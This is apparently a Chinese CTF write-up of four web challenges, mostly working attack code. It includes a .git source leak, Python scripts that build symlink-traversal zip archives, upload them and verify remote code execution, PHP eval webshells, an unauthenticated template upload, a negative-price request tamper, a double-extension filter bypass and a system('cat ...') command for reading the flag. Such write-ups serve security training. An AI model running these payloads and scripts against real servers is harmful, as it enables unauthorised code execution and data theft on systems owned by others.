狗黑子最后的起舞

目录扫描发现一个注册页面,注册并登录后页面上没有任何可用功能

注意到这些页面都位于同一个子目录下,于是针对该目录再次进行目录扫描

发现存在 .git 目录泄露,可据此还原站点源码


把文件下载下来

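<?php
// Upload handler recovered from the leaked .git. It stores the uploaded file
// under /etc/ and extracts it there with unzip. The exit status of exec() is
// now captured into $code, so the retry only runs when the first extraction
// actually failed (the original never assigned $code, so null !== 0 was
// always true and unzip ran twice unconditionally).
if (isset($_FILES['file'])) {
    $f = $_FILES['file'];
    if ($f['error'] === UPLOAD_ERR_OK) {
        // Saving into /etc/ only works if the web server runs as root or has
        // been granted write access to that directory.
        $dest = '/etc/' . time() . '_' . basename($f['name']);
        if (move_uploaded_file($f['tmp_name'], $dest)) {
            $escapedDest = escapeshellarg($dest);
            // SECURITY: the path is shell-escaped, but unzip -o overwrites
            // existing files and recreates symlinks stored in the archive, so
            // an attacker-controlled zip can plant a link and make a later
            // upload write outside /etc/ (symlink traversal).
            exec("unzip -o $escapedDest -d /etc/ 2>&1", $output, $code);
            if ($code !== 0) {
                // Retry once on a non-zero exit status.
                exec("unzip -o $escapedDest -d /etc/ 2>&1", $output, $code);
            }
            // Remove the archive itself; only the extracted content remains.
            unlink($dest);
            echo "ghz";
        }
    }
}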
我们整一个文件上传的页面

这是一个文件上传后端,会把上传的 zip 压缩包解压到 /etc 目录下,而 unzip 会原样恢复压缩包中的软链接,所以这里考察的是软链接穿越:先解压出一个指向 /var/www/html 的软链接,再上传一个往该链接目录里写文件的压缩包,就能把文件写到 web 根目录
我们创建一个指向/var/www/html的软链接
# Create a link named "html" in the current directory that points at the web
# root, then archive it as a link (--symlinks is the long form of -y) instead
# of descending into the target directory.
ln -s /var/www/html html
zip --symlinks 1.zip html
先上传这个只含软链接的压缩包,再制作并上传第二个压缩包,其中木马的路径为 html/shell.php(与上一步软链接同名),解压时就会顺着软链接把木马写入 /var/www/html/

懒得手工操作的话,可以直接用下面的自动化脚本(gen_zip.py 负责生成两个压缩包,另一个脚本负责上传并验证)
import zipfile
import os
def create_symlink_zip(zip_name, link_name, target_path):
    """Write a zip archive whose single entry is a Unix symlink.

    The entry called ``link_name`` carries mode 0120755 (S_IFLNK | 0755) in
    the upper 16 bits of ``external_attr`` and its data is the link target
    ``target_path``; an unzip that honours Unix attributes recreates it as a
    symlink rather than a regular file.
    """
    # 0o120755 == 0xA1ED; zip stores Unix mode bits in the high half-word.
    symlink_mode = 0o120755 << 16
    entry = zipfile.ZipInfo(link_name)
    entry.create_system = 3  # 3 = Unix, otherwise the mode bits are ignored
    entry.external_attr = symlink_mode
    with zipfile.ZipFile(zip_name, "w") as archive:
        archive.writestr(entry, target_path)
def create_payload_zip(zip_name, link_name, filename, content):
    """Write a zip archive holding one file below the directory ``link_name``.

    If ``link_name`` already exists on the target as a symlink (planted by an
    earlier archive), an extractor that follows it writes ``filename`` into
    the link's destination instead of the extraction directory.
    """
    entry_path = os.path.join(link_name, filename)
    archive = zipfile.ZipFile(zip_name, "w")
    try:
        archive.writestr(entry_path, content)
    finally:
        archive.close()
if __name__ == "__main__":
    # Stage 1 plants the symlink; stage 2 writes the shell through it.
    link_zip, shell_zip = "link.zip", "shell.zip"
    create_symlink_zip(link_zip, "link", "/var/www/html")
    create_payload_zip(shell_zip, "link", "shell.php", "<?php eval($_POST['cmd']); ?>")
    print("Generated link.zip and shell.zip")
import requests
import os
import time
# Challenge endpoints; the host is instance-specific.
BASE_URL = "http://7efb8092-2773-49db-9d2e-adf6f1819a5a.www.polarctf.com:8090/"
# Upload handler, relative to the site root.
TARGET_URL = BASE_URL + "ghzpolar/gouheizi.php"
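def upload(filename):
    """POST ``filename`` as the multipart field ``file`` to TARGET_URL.

    Prints progress for the operator and returns the response body as text.
    The log line now names the file being sent (it previously printed a
    placeholder), and a timeout is set so an unresponsive target does not
    hang the script; connection failures surface as requests exceptions.
    """
    print(f"[*] Uploading {filename}...")
    with open(filename, "rb") as fh:
        # Content type is what the handler expects; the server only looks at
        # the upload error code and the basename.
        files = {"file": (filename, fh, "application/zip")}
        resp = requests.post(TARGET_URL, files=files, timeout=10)
    print(f"[+] Response: {resp.text.strip()}")
    return resp.text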
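def check_shell():
    """Probe the candidate webshell locations and confirm code execution.

    Returns True on the first path that answers 200 and echoes the marker,
    False otherwise. Only transport-level errors (requests.RequestException)
    are caught and reported; any other exception is a bug in this script and
    is allowed to propagate. The RCE probe now also carries a timeout.
    """
    # Docroot or the challenge subdirectory, depending on where the symlink
    # actually pointed.
    candidate_paths = ["shell.php", "ghzpolar/shell.php"]
    for path in candidate_paths:
        url = BASE_URL + path
        print(f"[*] Checking shell at {url}...")
        try:
            probe = requests.get(url, timeout=5)
            if probe.status_code != 200:
                continue
            print(f"[!!!] Shell found at {url}")
            # eval() of the payload must print the marker; a 200 alone could
            # be any page, so it is not treated as success.
            rce = requests.post(url, data={"cmd": 'echo "pwned";'}, timeout=5)
            if "pwned" in rce.text:
                print("[!!!] RCE verified!")
                return True
        except requests.RequestException as e:
            print(f"[-] Error checking {url}: {e}")
    return False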
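if __name__ == "__main__":
    import subprocess
    import sys

    # 1. Build the two archives with the generator script. Run it with the
    #    same interpreter, without a shell, and abort if it fails so stale or
    #    missing zips are never uploaded (os.system ignored the exit status).
    print("[*] Generating ZIP files...")
    subprocess.run([sys.executable, "gen_zip.py"], check=True)
    # 2. Plant the symlink under /etc/.
    upload("link.zip")
    # 3. Write the shell through the symlink.
    upload("shell.zip")
    # 4. Verify that the shell is reachable and executes code.
    check_shell()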

coke粉丝团

先来注册一个账号

成功登录后可以看到,我们需要使用钻石购买灯牌,灯牌达到 10 级即可获取 flag

有一个提示

可以看到每一个灯牌都有一个固定的图片名字,由此可以推出10级灯牌的名字为coke10.png

对页面进行爆破

在第52页面


随便购买一个灯牌并抓包,把请求中的数值参数改为负数


应该是需要token

根据题目名称,生成 token 所用的密钥应该是 coke

密钥正确,重放后请求成功,拿到 flag
新年贺卡

<?php
// Greeting-card generator recovered from the challenge source. The script
// dispatches on ?action=; note that the 'admin' branch below performs no
// authentication or authorization of any kind.
require_once 'config.php';
require_once 'lib/CardGenerator.php';
require_once 'lib/TemplateManager.php';
// Anonymous per-visitor id; random_bytes() is CSPRNG-backed.
if (!isset($_SESSION['user'])) {
    $_SESSION['user'] = bin2hex(random_bytes(16));
}
$action = $_GET['action'] ?? 'home';
$generator = new CardGenerator();
try {
    switch ($action) {
        case 'generate':
            if ($_SERVER['REQUEST_METHOD'] === 'POST') {
                $template = $_POST['template'] ?? 'default';
                $message = $_POST['message'] ?? '';
                // Only the template name is validated here (by TemplateManager,
                // not shown); $message is passed to the generator as-is.
                if (!TemplateManager::isValidTemplate($template)) {
                    throw new Exception("无效的模板选择");
                }
                $cardData = $generator->generateCard($template, $message);
                $cardPath = $generator->saveCard($cardData);
                echo "<h1>您的新年贺卡已生成!</h1>";
                // $cardPath is interpolated into HTML unescaped; this is only
                // safe if saveCard() returns a path the client cannot influence
                // — confirm against CardGenerator.
                echo "<img src='$cardPath' alt='新年贺卡' style='max-width: 500px;'>";
                echo "<p><a href='?action=download&file=" . basename($cardPath) . "'>下载贺卡</a></p>";
            }
            break;
        case 'download':
            $file = $_GET['file'] ?? '';
            // basename() already strips any directory component, so the '../'
            // test below is redundant; the effective restriction is that only
            // files directly inside UPLOAD_DIR can be served.
            $filePath = UPLOAD_DIR . basename($file);
            if (empty($file) || !is_file($filePath) || strpos($file, '../') !== false) {
                throw new Exception("无效的文件请求");
            }
            header('Content-Type: image/png');
            header('Content-Disposition: attachment; filename="newyear_card.png"');
            readfile($filePath);
            exit;
        case 'admin':
            // No login or role check anywhere in this branch: any client that
            // requests ?action=admin reaches the template-management functions.
            if (isset($_GET['debug'])) {
                $debug = $_GET['debug'];
                if ($debug === 'show_templates') {
                    echo "<h1>模板列表</h1>";
                    $templates = TemplateManager::getAvailableTemplates();
                    echo "<pre>";
                    print_r($templates);
                    echo "</pre>";
                    // Also dumps the raw directory listing, disclosing file names.
                    echo "<h2>模板目录文件:</h2>";
                    echo "<pre>";
                    print_r(scandir(TEMPLATE_DIR));
                    echo "</pre>";
                }
                else if ($debug === 'add_template' && $_SERVER['REQUEST_METHOD'] === 'POST') {
                    // Template name and body come straight from POST. The path
                    // echoed below shows the body is persisted as
                    // TEMPLATE_DIR/<name>.php, i.e. client-supplied PHP on disk.
                    // Whatever filtering exists lives in TemplateManager::addTemplate
                    // (not visible here).
                    $name = $_POST['template_name'] ?? '';
                    $content = $_POST['template_content'] ?? '';
                    try {
                        TemplateManager::addTemplate($name, $content);
                        // $name is reflected unescaped (XSS unless restricted server-side).
                        echo "<p style='color: green;'>模板 '$name' 添加成功!</p>";
                        $filePath = TEMPLATE_DIR . $name . '.php';
                        if (file_exists($filePath)) {
                            echo "<p>文件路径: " . $filePath . "</p>";
                            echo "<p>文件权限: " . substr(sprintf('%o', fileperms($filePath)), -4) . "</p>";
                        }
                    } catch (Exception $e) {
                        echo "<p style='color: red;'>错误: " . $e->getMessage() . "</p>";
                    }
                }
                else if ($debug === '/** **/_form') {
                    // The odd '/** **/_form' value is just the literal debug key
                    // the menu below links to.
                    echo "<h1>添加新模板</h1>";
                    echo "<form method='post' action='?action=admin&debug=add_template'>";
                    // pattern= is enforced by the browser only; a hand-crafted
                    // POST bypasses it entirely.
                    echo "<p>模板名: <input type='text' name='template_name' pattern='[a-z0-9_]+' required></p>";
                    echo "<p>模板内容:<br><textarea name='template_content' rows='10' cols='50' required></textarea></p>";
                    echo "<p><input type='submit' value='添加模板'></p>";
                    echo "</form>";
                }
                else if ($debug === 'view_template') {
                    // $name is concatenated into the path without validation, so
                    // '../' sequences can read any .php file reachable from
                    // TEMPLATE_DIR (the content is HTML-escaped, but still disclosed).
                    $name = $_GET['name'] ?? '';
                    $path = TEMPLATE_DIR . $name . '.php';
                    if (file_exists($path)) {
                        // $name is reflected unescaped into the heading.
                        echo "<h1>模板内容: $name</h1>";
                        echo "<pre>" . htmlspecialchars(file_get_contents($path)) . "</pre>";
                    } else {
                        echo "<p>模板不存在</p>";
                    }
                }
            } else {
                echo "<h1>模板管理</h1>";
                echo "<ul>";
                echo "<li><a href='?action=admin&debug=show_templates'>查看模板列表</a></li>";
                echo "<li><a href='?action=admin&debug=/** **/_form'>添加模板</a></li>";
                echo "</ul>";
            }
            break;
        case 'home':
        default:
            // Home page: fetch the template list and render the form below.
            $templates = TemplateManager::getAvailableTemplates();
?>
<!DOCTYPE html>
<html>
<head>
<title>新年贺卡生成器</title>
<meta charset="UTF-8">
<style>
body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; background: #f5f5f5; }
.container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
h1 { color: #d32f2f; text-align: center; }
textarea { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; }
select { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; }
button { width: 100%; padding: 12px; background: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; }
</style>
</head>
<body>
<div class="container">
<h1>🎉 新年贺卡生成器 🎉</h1>
<form action="?action=generate" method="post">
<div>
<label for="message">祝福语:</label><br>
<textarea id="message" name="message" rows="4" required>新年快乐,万事如意!</textarea>
</div>
<div>
<label for="template">选择模板:</label><br>
<select id="template" name="template" required>
<?php foreach ($templates as $tpl): ?>
<option value="<?php echo $tpl; ?>"><?php echo ucfirst($tpl); ?></option>
<?php endforeach; ?>
</select>
</div>
<button type="submit">生成贺卡</button>
</form>
</div>
</body>
</html>
<?php
    }
} catch (Exception $e) {
    // Exception text (including internal messages) is shown to the client.
    die("<h1>错误</h1><p>" . $e->getMessage() . "</p>");
}
?>
#在 case 'admin' 块中,程序没有任何登录验证
#只要在 URL 中传入 ?action=admin 即可直接进入模板管理功能

$name = $_POST['template_name'] ?? '';
$content = $_POST['template_content'] ?? '';
try {
TemplateManager::addTemplate($name, $content);
// ... 后面会自动拼接 .php 并保存
}
#在 template_content 中写入 PHP 一句话木马
#文件名:把 template_name 设为 shell(表单上的 pattern 只是浏览器端限制,服务端会把名字直接拼接成 TEMPLATE_DIR/shell.php)
#向 ?action=admin&debug=add_template 发送 POST 请求,木马就会以 shell.php 落盘;从后续步骤看,随后通过生成贺卡选择该模板来触发它


接着回到首页制作贺卡,模板选择刚添加的 shell,从而让木马被加载执行

成功获取flag
GET
这是一个上传页面,对后缀的过滤可以通过文件名双写绕过(例如写成 .pphphp,过滤删掉一次 php 后正好剩下 .php)

<?php $x = $_POST; @eval($x['cmd']); /* one-line webshell: executes whatever PHP arrives in POST parameter "cmd"; the @ suppresses error output */ ?>

flag 文件不会直接显示出来(直接访问会被拒绝),需要通过木马读取它的源码

cmd=system("cat ../0095c0930065b64d547f9794abac00ab.php");

<!--?php
// Flag file as read back through the webshell (the browser rendered the
// "<?php" open tag as an HTML comment, hence "<!--?php" in the page source).
// The guard dies only when this file is itself the requested script
// (__FILE__ equals SCRIPT_FILENAME); reading the file's bytes with cat, as
// done above, never executes it and so sidesteps the check entirely.
if (__FILE__ === $_SERVER['SCRIPT_FILENAME']) {
    die("Access Denied!");
}
echo "flag{73121d2832f501293a2e661c4d3a082f}";
?-->